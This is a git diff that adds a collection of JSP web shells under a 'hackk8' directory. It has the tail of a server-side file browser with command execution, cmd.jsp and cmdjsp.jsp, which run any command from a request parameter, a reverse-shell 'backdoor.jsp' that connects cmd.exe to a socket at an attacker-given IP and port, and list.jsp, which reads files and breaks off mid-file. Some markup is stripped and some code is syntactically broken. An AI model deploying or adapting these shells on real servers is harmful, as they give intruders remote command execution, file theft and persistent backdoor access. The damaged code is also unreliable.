+						zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l + 1)));
+						BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f));
+						byte buffer[] = new byte[0xffff];
+						copyStreamsWithoutClose(fr, zipout, buffer);
+						/*					int b;
+						 while ((b=fr.read())!=-1) zipout.write(b);*/
+						fr.close();
+						zipout.closeEntry();
+					}
+				}
+				zipout.finish();
+				out.flush();
+				nohtml = true;
+				dir_view = false;
+			}
+		}
+		// Download file
+		else if (request.getParameter("downfile") != null) {
+			String filePath = request.getParameter("downfile");
+			File f = new File(filePath);
+			if (!isAllowed(f)){
+				request.setAttribute("dir", f.getParent());
+				request.setAttribute("error", "You are not allowed to access " + f.getAbsoluteFile());
+			}
+			else if (f.exists() && f.canRead()) {
+				response.setContentType("application/octet-stream");
+				response.setHeader("Content-Disposition", "attachment;filename=\"" + f.getName()
+						+ "\"");
+				response.setContentLength((int) f.length());
+				BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f));
+				byte buffer[] = new byte[8 * 1024];
+				out.clearBuffer();
+				OutputStream out_s = new Writer2Stream(out);
+				copyStreamsWithoutClose(fileInput, out_s, buffer);
+				fileInput.close();
+				out_s.flush();
+				nohtml = true;
+				dir_view = false;
+			}
+			else {
+				request.setAttribute("dir", f.getParent());
+				request.setAttribute("error", "File " + f.getAbsolutePath()
+						+ " does not exist or is not readable on the server");
+			}
+		}
+		if (nohtml) return;
+		//else
+			// If no parameter is submitted, it will take the path from jsp file browser
+			if (request.getAttribute("dir") == null) {
+				String path = null;
+				if (application.getRealPath(request.getRequestURI()) != null) path = new File(
+						application.getRealPath(request.getRequestURI())).getParent();
+
+				if (path == null) { // handle the case where we are not in a directory (ex: war file)
+					path = new File(".").getAbsolutePath();
+				}
+				//Check path
+                if (!isAllowed(new File(path))){
+                    if (RESTRICT_PATH.indexOf(";")<0) path = RESTRICT_PATH;
+                    else path = RESTRICT_PATH.substring(0, RESTRICT_PATH.indexOf(";"));
+                }
+				request.setAttribute("dir", path);
+			}%>
+
+
+
+
+
+
+
+<%
+			//If a cssfile exists, it will take it
+			String cssPath = null;
+			if (application.getRealPath(request.getRequestURI()) != null) cssPath = new File(
+					application.getRealPath(request.getRequestURI())).getParent()
+					+ File.separator + CSS_NAME;
+			if (cssPath == null) cssPath = application.getResource(CSS_NAME).toString();
+			if (new File(cssPath).exists()) {
+%>
+
+      <%}
+			else if (request.getParameter("uplMonitor") == null) {%>
+	
+	<%}
+		
+        //Check path
+        if (!isAllowed(new File((String)request.getAttribute("dir")))){
+            request.setAttribute("error", "You are not allowed to access " + request.getAttribute("dir"));
+        }
+		//Upload monitor
+		else if (request.getParameter("uplMonitor") != null) {%>
+	<%
+			String fname = request.getParameter("uplMonitor");
+			//First opening
+			boolean first = false;
+			if (request.getParameter("first") != null) first = true;
+			UplInfo info = new UplInfo();
+			if (!first) {
+				info = UploadMonitor.getInfo(fname);
+				if (info == null) {
+					//Windows
+					int posi = fname.lastIndexOf("\\");
+					if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1));
+				}
+				if (info == null) {
+					//Unix
+					int posi = fname.lastIndexOf("/");
+					if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1));
+				}
+			}
+			dir_view = false;
+			request.setAttribute("dir", null);
+			if (info.aborted) {
+				UploadMonitor.remove(fname);
+				%>
+
+
+Upload of <%=fname%>

    
+Upload aborted.
+<%
+			}
+			else if (info.totalSize != info.currSize || info.currSize == 0) {
+				%>
+
+
+
+Upload of <%=fname%>

    
+
    
+
+
+
    
+<%=convertFileSize(info.currSize)%> from <%=convertFileSize(info.totalSize)%>
+(<%=info.getPercent()%> %) uploaded (Speed: <%=info.getUprate()%>).
    
+Time: <%=info.getTimeElapsed()%> from <%=info.getTimeEstimated()%>
+
+<%
+			}
+			else {
+				UploadMonitor.remove(fname);
+				%>
+
+
+Upload of <%=fname%>

    
+Upload finished.
+
+<%
+			}
+		}
+		//Comandwindow
+		else if (request.getParameter("command") != null) {
+            if (!NATIVE_COMMANDS){
+                request.setAttribute("error", "Execution of native commands is not allowed!");
+            }
+			else if (!"Cancel".equalsIgnoreCase(request.getParameter("Submit"))) {
+%>
+Launch commands in <%=request.getAttribute("dir")%>
+
+
+<%
+				out.println("
    \n"
+						+ "
+	">
+	
    
+	
+	
+	
+	
    
+	
+	
    
+	">
+	
    
+	
    
+
+
+<%
+				dir_view = false;
+				request.setAttribute("dir", null);
+			}
+		}
+
+		//Click on a filename, special viewer (zip+jar file)
+		else if (request.getParameter("file") != null) {
+			File f = new File(request.getParameter("file"));
+            if (!isAllowed(f)){
+                request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
+            }
+			else if (isPacked(f.getName(), false)) {
+				//ZipFile
+				try {
+					ZipFile zf = new ZipFile(f);
+					Enumeration entries = zf.entries();
+%>
+<%= f.getAbsolutePath()%>
+
+
+	
    Content of <%=conv2Html(f.getName())%>

    
+	
+	
+<%
+					long size = 0;
+					int fileCount = 0;
+					while (entries.hasMoreElements()) {
+						ZipEntry entry = (ZipEntry) entries.nextElement();
+						if (!entry.isDirectory()) {
+							fileCount++;
+							size += entry.getSize();
+							long ratio = 0;
+							if (entry.getSize() != 0) ratio = (entry.getCompressedSize() * 100)
+									/ entry.getSize();
+							out.println("");
+
+						}
+					}
+					zf.close();
+					//No directory view
+					dir_view = false;
+					request.setAttribute("dir", null);
+%>
+	
    NameUncompressed sizeCompressed sizeCompr. ratioDate
    " + conv2Html(entry.getName())
+									+ "" + convertFileSize(entry.getSize()) + ""
+									+ convertFileSize(entry.getCompressedSize()) + ""
+									+ ratio + "%" + ""
+									+ dateFormat.format(new Date(entry.getTime())) + "
    
+	
    
+	<%=convertFileSize(size)%> in <%=fileCount%> files in <%=f.getName()%>. Compression ratio: <%=(f.length() * 100) / size%>%
+	
    
+
+<%
+				}
+				catch (ZipException ex) {
+					request.setAttribute("error", "Cannot read " + f.getName()
+							+ ", no valid zip file");
+				}
+				catch (IOException ex) {
+					request.setAttribute("error", "Reading of " + f.getName() + " aborted. Error: "
+							+ ex);
+				}
+			}
+		}
+		// Upload
+		else if ((request.getContentType() != null)
+				&& (request.getContentType().toLowerCase().startsWith("multipart"))) {
+			response.setContentType("text/html");
+			HttpMultiPartParser parser = new HttpMultiPartParser();
+			boolean error = false;
+			try {
+				int bstart = request.getContentType().lastIndexOf("oundary=");
+				String bound = request.getContentType().substring(bstart + 8);
+				int clength = request.getContentLength();
+				Hashtable ht = parser
+						.processData(request.getInputStream(), bound, tempdir, clength);
+                if (!isAllowed(new File((String)ht.get("dir")))){
+                    request.setAttribute("error", "You are not allowed to access " + ht.get("dir"));
+                    error = true;
+                }
+				else if (ht.get("myFile") != null) {
+					FileInfo fi = (FileInfo) ht.get("myFile");
+					File f = fi.file;
+					UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
+					if (info != null && info.aborted) {
+						f.delete();
+						request.setAttribute("error", "Upload aborted");
+					}
+					else {
+						// Move file from temp to the right dir
+						String path = (String) ht.get("dir");
+						if (!path.endsWith(File.separator)) path = path + File.separator;
+						if (!f.renameTo(new File(path + f.getName()))) {
+							request.setAttribute("error", "Cannot upload file.");
+							error = true;
+							f.delete();
+						}
+					}
+				}
+				else {
+					request.setAttribute("error", "No file selected for upload");
+					error = true;
+				}
+				request.setAttribute("dir", (String) ht.get("dir"));
+			}
+			catch (Exception e) {
+				request.setAttribute("error", "Error " + e + ". Upload aborted");
+				error = true;
+			}
+			if (!error) request.setAttribute("message", "File upload correctly finished.");
+		}
+		// The form to edit a text file
+		else if (request.getParameter("editfile") != null) {
+			File ef = new File(request.getParameter("editfile"));
+            if (!isAllowed(ef)){
+                request.setAttribute("error", "You are not allowed to access " + ef.getAbsolutePath());
+            }
+            else{
+%>
+Edit <%=conv2Html(request.getParameter("editfile"))%>
+
+
+<%
+                BufferedReader reader = new BufferedReader(new FileReader(ef));
+                String disable = "";
+                if (!ef.canWrite()) disable = " readonly";
+                out.println("
    \n"
+                        + "
+	">
+	
    
+	
+		
+		
+		
+		
+		
+		
+	
    >Ms-Dos/Windows>UnixWrite backup
    
+		">
+		
    
+	
    
+
+
+<%
+            }
+		}
+		// Save or cancel the edited file
+		else if (request.getParameter("nfile") != null) {
+			File f = new File(request.getParameter("nfile"));
+			File new_f = new File(getDir(f.getParent(), request.getParameter("new_name")));
+            if (!isAllowed(new_f)){
+                request.setAttribute("error", "You are not allowed to access " + new_f.getAbsolutePath());
+            }
+			else if (request.getParameter("Submit").equals("Save")) {
+				if (new_f.exists() && new_f.canWrite() && request.getParameter("Backup") != null) {
+					File bak = new File(new_f.getAbsolutePath() + ".bak");
+					bak.delete();
+					new_f.renameTo(bak);
+				}
+				if (new_f.exists() && !new_f.canWrite()) request.setAttribute("error",
+						"Cannot write to " + new_f.getName() + ", file is write protected.");
+				else {
+					BufferedWriter outs = new BufferedWriter(new FileWriter(new_f));
+					StringReader text = new StringReader(request.getParameter("text"));
+					int i;
+					boolean cr = false;
+					String lineend = "\n";
+					if (request.getParameter("lineformat").equals("dos")) lineend = "\r\n";
+					while ((i = text.read()) >= 0) {
+						if (i == '\r') cr = true;
+						else if (i == '\n') {
+							outs.write(lineend);
+							cr = false;
+						}
+						else if (cr) {
+							outs.write(lineend);
+							cr = false;
+						}
+						else {
+							outs.write(i);
+							cr = false;
+						}
+					}
+					outs.flush();
+					outs.close();
+				}
+			}
+			request.setAttribute("dir", f.getParent());
+		}
+		//Unpack file to the current directory without overwriting
+		else if (request.getParameter("unpackfile") != null) {
+			File f = new File(request.getParameter("unpackfile"));
+			String root = f.getParent();
+			request.setAttribute("dir", root);
+            if (!isAllowed(new File(root))){
+                request.setAttribute("error", "You are not allowed to access " + root);
+            }
+			//Check if file exists
+			else if (!f.exists()) {
+				request.setAttribute("error", "Cannot unpack " + f.getName()
+						+ ", file does not exist");
+			}
+			//Check if directory is readonly
+			else if (!f.getParentFile().canWrite()) {
+				request.setAttribute("error", "Cannot unpack " + f.getName()
+						+ ", directory is write protected.");
+			}
+			//GZip
+			else if (f.getName().toLowerCase().endsWith(".gz")) {
+				//New name is old Name without .gz
+				String newName = f.getAbsolutePath().substring(0, f.getAbsolutePath().length() - 3);
+				try {
+					byte buffer[] = new byte[0xffff];
+					copyStreams(new GZIPInputStream(new FileInputStream(f)), new FileOutputStream(
+							newName), buffer);
+				}
+				catch (IOException ex) {
+					request.setAttribute("error", "Unpacking of " + f.getName()
+							+ " aborted. Error: " + ex);
+				}
+			}
+			//Else try Zip
+			else {
+				try {
+					ZipFile zf = new ZipFile(f);
+					Enumeration entries = zf.entries();
+					//First check whether a file already exist
+					boolean error = false;
+					while (entries.hasMoreElements()) {
+						ZipEntry entry = (ZipEntry) entries.nextElement();
+						if (!entry.isDirectory()
+								&& new File(root + File.separator + entry.getName()).exists()) {
+							request.setAttribute("error", "Cannot unpack " + f.getName()
+									+ ", File " + entry.getName() + " already exists.");
+							error = true;
+							break;
+						}
+					}
+					if (!error) {
+						//Unpack File
+						entries = zf.entries();
+						byte buffer[] = new byte[0xffff];
+						while (entries.hasMoreElements()) {
+							ZipEntry entry = (ZipEntry) entries.nextElement();
+							File n = new File(root + File.separator + entry.getName());
+							if (entry.isDirectory()) n.mkdirs();
+							else {
+								n.getParentFile().mkdirs();
+								n.createNewFile();
+								copyStreams(zf.getInputStream(entry), new FileOutputStream(n),
+										buffer);
+							}
+						}
+						zf.close();
+						request.setAttribute("message", "Unpack of " + f.getName()
+								+ " was successful.");
+					}
+				}
+				catch (ZipException ex) {
+					request.setAttribute("error", "Cannot unpack " + f.getName()
+							+ ", no valid zip file");
+				}
+				catch (IOException ex) {
+					request.setAttribute("error", "Unpacking of " + f.getName()
+							+ " aborted. Error: " + ex);
+				}
+			}
+		}
+		// Delete Files
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(DELETE_FILES))) {
+			Vector v = expandFileList(request.getParameterValues("selfile"), true);
+			boolean error = false;
+			//delete backwards
+			for (int i = v.size() - 1; i >= 0; i--) {
+				File f = (File) v.get(i);
+                if (!isAllowed(f)){
+                    request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
+                    error = true;
+                    break;
+                }
+				if (!f.canWrite() || !f.delete()) {
+					request.setAttribute("error", "Cannot delete " + f.getAbsolutePath()
+							+ ". Deletion aborted");
+					error = true;
+					break;
+				}
+			}
+			if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files deleted");
+			else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File deleted");
+			else if (!error) request.setAttribute("error", "No files selected");
+		}
+		// Create Directory
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(CREATE_DIR))) {
+			String dir = "" + request.getAttribute("dir");
+			String dir_name = request.getParameter("cr_dir");
+			String new_dir = getDir(dir, dir_name);
+            if (!isAllowed(new File(new_dir))){
+                request.setAttribute("error", "You are not allowed to access " + new_dir);
+            }
+			else if (new File(new_dir).mkdirs()) {
+				request.setAttribute("message", "Directory created");
+			}
+			else request.setAttribute("error", "Creation of directory " + new_dir + " failed");
+		}
+		// Create a new empty file
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(CREATE_FILE))) {
+			String dir = "" + request.getAttribute("dir");
+			String file_name = request.getParameter("cr_dir");
+			String new_file = getDir(dir, file_name);
+            if (!isAllowed(new File(new_file))){
+                request.setAttribute("error", "You are not allowed to access " + new_file);
+            }
+			// Test, if file_name is empty
+			else if (!"".equals(file_name.trim()) && !file_name.endsWith(File.separator)) {
+				if (new File(new_file).createNewFile()) request.setAttribute("message",
+						"File created");
+				else request.setAttribute("error", "Creation of file " + new_file + " failed");
+			}
+			else request.setAttribute("error", "Error: " + file_name + " is not a valid filename");
+		}
+		// Rename a file
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(RENAME_FILE))) {
+			Vector v = expandFileList(request.getParameterValues("selfile"), true);
+			String dir = "" + request.getAttribute("dir");
+			String new_file_name = request.getParameter("cr_dir");
+			String new_file = getDir(dir, new_file_name);
+            if (!isAllowed(new File(new_file))){
+                request.setAttribute("error", "You are not allowed to access " + new_file);
+            }
+			// The error conditions:
+			// 1) Zero Files selected
+			else if (v.size() <= 0) request.setAttribute("error",
+					"Select exactly one file or folder. Rename failed");
+			// 2a) Multiple files selected and the first isn't a dir
+			//     Here we assume that expandFileList builds v from top-bottom, starting with the dirs
+			else if ((v.size() > 1) && !(((File) v.get(0)).isDirectory())) request.setAttribute(
+					"error", "Select exactly one file or folder. Rename failed");
+			// 2b) If there are multiple files from the same directory, rename fails
+			else if ((v.size() > 1) && ((File) v.get(0)).isDirectory()
+					&& !(((File) v.get(0)).getPath().equals(((File) v.get(1)).getParent()))) {
+				request.setAttribute("error", "Select exactly one file or folder. Rename failed");
+			}
+			else {
+				File f = (File) v.get(0);
+                if (!isAllowed(f)){
+                    request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
+                }
+				// Test, if file_name is empty
+				else if ((new_file.trim() != "") && !new_file.endsWith(File.separator)) {
+					if (!f.canWrite() || !f.renameTo(new File(new_file.trim()))) {
+						request.setAttribute("error", "Creation of file " + new_file + " failed");
+					}
+					else request.setAttribute("message", "Renamed file "
+							+ ((File) v.get(0)).getName() + " to " + new_file);
+				}
+				else request.setAttribute("error", "Error: \"" + new_file_name
+						+ "\" is not a valid filename");
+			}
+		}
+		// Move selected file(s)
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(MOVE_FILES))) {
+			Vector v = expandFileList(request.getParameterValues("selfile"), true);
+			String dir = "" + request.getAttribute("dir");
+			String dir_name = request.getParameter("cr_dir");
+			String new_dir = getDir(dir, dir_name);
+            if (!isAllowed(new File(new_dir))){
+                request.setAttribute("error", "You are not allowed to access " + new_dir);
+            }
+            else{
+    			boolean error = false;
+                // This ensures that new_dir is a directory
+                if (!new_dir.endsWith(File.separator)) new_dir += File.separator;
+                for (int i = v.size() - 1; i >= 0; i--) {
+                    File f = (File) v.get(i);
+                    if (!isAllowed(f)){
+                        request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
+                        error = true;
+                        break;
+                    }
+                    else if (!f.canWrite() || !f.renameTo(new File(new_dir
+                            + f.getAbsolutePath().substring(dir.length())))) {
+                        request.setAttribute("error", "Cannot move " + f.getAbsolutePath()
+                                + ". Move aborted");
+                        error = true;
+                        break;
+                    }
+                }
+                if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files moved");
+                else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File moved");
+                else if (!error) request.setAttribute("error", "No files selected");
+            }
+		}
+		// Copy Files
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(COPY_FILES))) {
+			Vector v = expandFileList(request.getParameterValues("selfile"), true);
+			String dir = (String) request.getAttribute("dir");
+			if (!dir.endsWith(File.separator)) dir += File.separator;
+			String dir_name = request.getParameter("cr_dir");
+			String new_dir = getDir(dir, dir_name);
+            if (!isAllowed(new File(new_dir))){
+                request.setAttribute("error", "You are not allowed to access " + new_dir);
+            }
+            else{
+    			boolean error = false;
+                if (!new_dir.endsWith(File.separator)) new_dir += File.separator;
+                try {
+                    byte buffer[] = new byte[0xffff];
+                    for (int i = 0; i < v.size(); i++) {
+                        File f_old = (File) v.get(i);
+                        File f_new = new File(new_dir + f_old.getAbsolutePath().substring(dir.length()));
+                        if (!isAllowed(f_old)|| !isAllowed(f_new)){
+                            request.setAttribute("error", "You are not allowed to access " + f_new.getAbsolutePath());
+                            error = true;
+                        }
+                        else if (f_old.isDirectory()) f_new.mkdirs();
+                        // Overwriting is forbidden
+                        else if (!f_new.exists()) {
+                            copyStreams(new FileInputStream(f_old), new FileOutputStream(f_new), buffer);
+                        }
+                        else {
+                            // File exists
+                            request.setAttribute("error", "Cannot copy " + f_old.getAbsolutePath()
+                                    + ", file already exists. Copying aborted");
+                            error = true;
+                            break;
+                        }
+                    }
+                }
+                catch (IOException e) {
+                    request.setAttribute("error", "Error " + e + ". Copying aborted");
+                    error = true;
+                }
+                if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files copied");
+                else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File copied");
+                else if (!error) request.setAttribute("error", "No files selected");
+            }
+		}
+		// Directory viewer
+		if (dir_view && request.getAttribute("dir") != null) {
+			File f = new File("" + request.getAttribute("dir"));
+			//Check, whether the dir exists
+			if (!f.exists() || !isAllowed(f)) {
+				if (!f.exists()){
+                    request.setAttribute("error", "Directory " + f.getAbsolutePath() + " does not exist.");
+                }
+                else{
+                    request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
+                }
+				//if attribute olddir exists, it will change to olddir
+				if (request.getAttribute("olddir") != null && isAllowed(new File((String) request.getAttribute("olddir")))) {
+					f = new File("" + request.getAttribute("olddir"));
+				}
+				//try to go to the parent dir
+				else {
+					if (f.getParent() != null && isAllowed(f)) f = new File(f.getParent());
+				}
+				//If this dir also do also not exist, go back to browser.jsp root path
+				if (!f.exists()) {
+					String path = null;
+					if (application.getRealPath(request.getRequestURI()) != null) path = new File(
+							application.getRealPath(request.getRequestURI())).getParent();
+
+					if (path == null) // handle the case were we are not in a directory (ex: war file)
+					path = new File(".").getAbsolutePath();
+					f = new File(path);
+				}
+				if (isAllowed(f)) request.setAttribute("dir", f.getAbsolutePath());
+                else request.setAttribute("dir", null);
+			}
+%>
+
+<%=request.getAttribute("dir")%>
+
+
+<%
+			//Output message
+			if (request.getAttribute("message") != null) {
+				out.println("
    ");
+				out.println(request.getAttribute("message"));
+				out.println("
    ");
+			}
+			//Output error
+			if (request.getAttribute("error") != null) {
+				out.println("
    ");
+				out.println(request.getAttribute("error"));
+				out.println("
    ");
+			}
+            if (request.getAttribute("dir") != null){
+%>
+	
    
+	
+<%
+			// Output the table, starting with the headers.
+			String dir = URLEncoder.encode("" + request.getAttribute("dir"));
+			String cmd = browser_name + "?dir=" + dir;
+			int sortMode = 1;
+			if (request.getParameter("sort") != null) sortMode = Integer.parseInt(request
+					.getParameter("sort"));
+			int[] sort = new int[] {1, 2, 3, 4};
+			for (int i = 0; i < sort.length; i++)
+				if (sort[i] == sortMode) sort[i] = -sort[i];
+			out.println(""
+					+ ""
+					+ ""
+					+ ""
+					+ "");
+			char trenner = File.separatorChar;
+			// Output the Root-Dirs, without FORBIDDEN_DRIVES
+			File[] entry = File.listRoots();
+			for (int i = 0; i < entry.length; i++) {
+				boolean forbidden = false;
+				for (int i2 = 0; i2 < FORBIDDEN_DRIVES.length; i2++) {
+					if (entry[i].getAbsolutePath().toLowerCase().equals(FORBIDDEN_DRIVES[i2])) forbidden = true;
+				}
+				if (!forbidden) {
+					out.println("");
+					out.println("");
+				}
+			}
+			// Output the parent directory link ".."
+			if (f.getParent() != null) {
+				out.println("");
+				out.println("");
+			}
+			// Output all files and dirs and calculate the number of files and total size
+			entry = f.listFiles();
+			if (entry == null) entry = new File[] {};
+			long totalSize = 0; // The total size of the files in the current directory
+			long fileCount = 0; // The count of files in the current working directory
+			if (entry != null && entry.length > 0) {
+				Arrays.sort(entry, new FileComp(sortMode));
+				for (int i = 0; i < entry.length; i++) {
+					String name = URLEncoder.encode(entry[i].getAbsolutePath());
+					String type = "File"; // This String will tell the extension of the file
+					if (entry[i].isDirectory()) type = "DIR"; // It's a DIR
+					else {
+						String tempName = entry[i].getName().replace(' ', '_');
+						if (tempName.lastIndexOf('.') != -1) type = tempName.substring(
+								tempName.lastIndexOf('.')).toLowerCase();
+					}
+					String ahref = "";
+					String link = buf; // The standard view link, uses Mime-type
+					if (entry[i].isDirectory()) {
+						if (entry[i].canRead() && USE_DIR_PREVIEW) {
+							//Show the first DIR_PREVIEW_NUMBER directory entries in a tooltip
+							File[] fs = entry[i].listFiles();
+							if (fs == null) fs = new File[] {};
+							Arrays.sort(fs, new FileComp());
+							StringBuffer filenames = new StringBuffer();
+							for (int i2 = 0; (i2 < fs.length) && (i2 < 10); i2++) {
+								String fname = conv2Html(fs[i2].getName());
+								if (fs[i2].isDirectory()) filenames.append("[" + fname + "];");
+								else filenames.append(fname + ";");
+							}
+							if (fs.length > DIR_PREVIEW_NUMBER) filenames.append("...");
+							else if (filenames.length() > 0) filenames
+									.setLength(filenames.length() - 1);
+							link = ahref + "dir=" + name + "\" title=\"" + filenames + "\">"
+									+ FOL_IMG + "[" + buf + "]";
+						}
+						else if (entry[i].canRead()) {
+							link = ahref + "dir=" + name + "\">" + FOL_IMG + "[" + buf + "]";
+						}
+						else link = FOL_IMG + "[" + buf + "]";
+					}
+					else if (entry[i].isFile()) { //Entry is file
+						totalSize = totalSize + entry[i].length();
+						fileCount = fileCount + 1;
+						if (entry[i].canRead()) {
+							dlink = ahref + "downfile=" + name + "\">Download";
+							//If you click at the filename
+							if (USE_POPUP) link = ahref + "file=" + name + "\" target=\"_blank\">"
+									+ buf + "";
+							else link = ahref + "file=" + name + "\">" + buf + "";
+							if (entry[i].canWrite()) { // The file can be edited
+								//If it is a zip or jar File you can unpack it
+								if (isPacked(name, true)) elink = ahref + "unpackfile=" + name
+										+ "\">Unpack";
+								else elink = ahref + "editfile=" + name + "\">Edit";
+							}
+							else { // If the file cannot be edited
+								//If it is a zip or jar File you can unpack it
+								if (isPacked(name, true)) elink = ahref + "unpackfile=" + name
+										+ "\">Unpack";
+								else elink = ahref + "editfile=" + name + "\">View";
+							}
+						}
+						else {
+							link = buf;
+						}
+					}
+					String date = dateFormat.format(new Date(entry[i].lastModified()));
+					out.println("");
+					if (entry[i].canRead()) {
+						out
+								.println("");
+					}
+					else {
+						out
+								.println("");
+					}
+					out.print("");
+					if (entry[i].isDirectory()) out.print("");
+					else {
+						out.print("");
+					}
+					out.println(""); // The edit link (or view, depending)
+				}
+			}%>
+	
     NameSizeTypeDate  
     ");
+					String name = URLEncoder.encode(entry[i].getAbsolutePath());
+					String buf = entry[i].getAbsolutePath();
+					out.println("  [" + buf + "]");
+					out
+							.println("     
    ");
+				out.println("  " + FOL_IMG + "[..]");
+				out
+						.println("     
      " + link + " "
+								+ convertFileSize(entry[i].length()) + "" + type + "  " + // The file type (extension)
+							date + "" + // The date the file was created
+							dlink + "" + // The download link
+							elink + "
    
+	Select all
+	
    
+		
+		<%=convertFileSize(totalSize)%> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%>
+		
+	
    
+	
    
+		">
+		
+		
+		
+	
    
+	
    
+		
+		
+		
+		
+		
+		
+	
    
+	
    
+	
    
+		">
+		
+		
+		
+	
    
+	<% if (NATIVE_COMMANDS){%>
+    
    
+		">
+		
+		
+		
+	
    <%
+    }
+    }%>
+	
    
+	
    
+		jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de
+	
    
+
+<%
+    }
+%>
\ No newline at end of file
diff --git a/jsp/hackk8/jsp_77/cmd.jsp b/jsp/hackk8/jsp_77/cmd.jsp
new file mode 100644
index 0000000..6357276
--- /dev/null
+++ b/jsp/hackk8/jsp_77/cmd.jsp
@@ -0,0 +1,35 @@
+<%@ page import="java.util.*,java.io.*"%>
+<%
+//
+// JSP_KIT
+//
+// cmd.jsp = Command Execution (unix)
+//
+// by: Unknown
+// modified: 27/06/2003
+//
+%>
+
+
    
+
+
+
    
+
    +<%
+if (request.getParameter("cmd") != null) {
+        out.println("Command: " + request.getParameter("cmd") + "
    ");
+        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
+        OutputStream os = p.getOutputStream();
+        InputStream in = p.getInputStream();
+        DataInputStream dis = new DataInputStream(in);
+        String disr = dis.readLine();
+        while ( disr != null ) {
+                out.println(disr); 
+                disr = dis.readLine(); 
+                }
+        }
+%>
+
    
+
+
+
diff --git a/jsp/hackk8/jsp_77/cmdjsp.jsp b/jsp/hackk8/jsp_77/cmdjsp.jsp
new file mode 100644
index 0000000..63625af
--- /dev/null
+++ b/jsp/hackk8/jsp_77/cmdjsp.jsp
@@ -0,0 +1,32 @@
+// note that linux = cmd and windows = "cmd.exe /c + cmd" 
+
+
    
+
+
+
    
+
+<%@ page import="java.io.*" %>
+<%
+   String cmd = request.getParameter("cmd");
+   String output = "";
+
+   if(cmd != null) {
+      String s = null;
+      try {
+         Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
+         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
+         while((s = sI.readLine()) != null) {
+            output += s;
+         }
+      }
+      catch(IOException e) {
+         e.printStackTrace();
+      }
+   }
+%>
+
+
    +<%=output %>
+
    
+
+
diff --git a/jsp/hackk8/jsp_77/jsp-reverse.jsp b/jsp/hackk8/jsp_77/jsp-reverse.jsp
new file mode 100644
index 0000000..ae9a781
--- /dev/null
+++ b/jsp/hackk8/jsp_77/jsp-reverse.jsp
@@ -0,0 +1,91 @@
+// backdoor.jsp
+// http://www.security.org.sg/code/jspreverse.html
+
+<%@
+page import="java.lang.*, java.util.*, java.io.*, java.net.*"
+% >
+<%!
+static class StreamConnector extends Thread
+{
+        InputStream is;
+        OutputStream os;
+
+        StreamConnector(InputStream is, OutputStream os)
+        {
+                this.is = is;
+                this.os = os;
+        }
+
+        public void run()
+        {
+                BufferedReader isr = null;
+                BufferedWriter osw = null;
+
+                try
+                {
+                        isr = new BufferedReader(new InputStreamReader(is));
+                        osw = new BufferedWriter(new OutputStreamWriter(os));
+
+                        char buffer[] = new char[8192];
+                        int lenRead;
+
+                        while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
+                        {
+                                osw.write(buffer, 0, lenRead);
+                                osw.flush();
+                        }
+                }
+                catch (Exception ioe)
+
+                try
+                {
+                        if(isr != null) isr.close();
+                        if(osw != null) osw.close();
+                }
+                catch (Exception ioe)
+        }
+}
+%>
+
+
    JSP Backdoor Reverse Shell
    
+
+
    
+IP Address
+
+Port
+
+
+
    
+
    
+
    
+
+<%
+String ipAddress = request.getParameter("ipaddress");
+String ipPort = request.getParameter("port");
+
+if(ipAddress != null && ipPort != null)
+{
+        Socket sock = null;
+        try
+        {
+                sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
+
+                Runtime rt = Runtime.getRuntime();
+                Process proc = rt.exec("cmd.exe");
+
+                StreamConnector outputConnector =
+                        new StreamConnector(proc.getInputStream(),
+                                          sock.getOutputStream());
+
+                StreamConnector inputConnector =
+                        new StreamConnector(sock.getInputStream(),
+                                          proc.getOutputStream());
+
+                outputConnector.start();
+                inputConnector.start();
+        }
+        catch(Exception e) 
+}
+%>
+
+
diff --git a/jsp/hackk8/jsp_77/list.jsp b/jsp/hackk8/jsp_77/list.jsp
new file mode 100644
index 0000000..eb0db3a
--- /dev/null
+++ b/jsp/hackk8/jsp_77/list.jsp
@@ -0,0 +1,77 @@
+<%@ page import="java.util.*,java.io.*"%>
+<%
+//
+// JSP_KIT
+//
+// list.jsp = Directory & File View
+//
+// by: Sierra
+// modified: 27/06/2003
+//
+%>
+<%
+if(request.getParameter("file")==null) {
+	%>
+	
+	
    
+	
+	
+	
    
+	<%
+	}
+%>
+<% //read the file name.
+try { 
+File f = new File(request.getParameter("file"));
+if(f.isDirectory()) {
+	int i;
+	String fname = new String("Unknown");
+	String fcolor = new String("Black");
+	%>
+	
+	
+	<%
+	out.print("Path: " + f.toString() + "
     
    ");
+	File flist[] = f.listFiles();
+	for(i=0; i" + fname.toString() + " " + "( Size: " + flist[i].length() + " bytes)
    \n");
+		}
+	%>
+	    
+	<%
+
+	} else {
+	if(f.canRead() == true) {
+		InputStream in = new FileInputStream(f);
+		ServletOutputStream outs = response.getOutputStream();
+		int left = 0;
+			try {
+			while((left) >= 0 ) {
+				left = in.read(); 
+				outs.write(left);
+				}
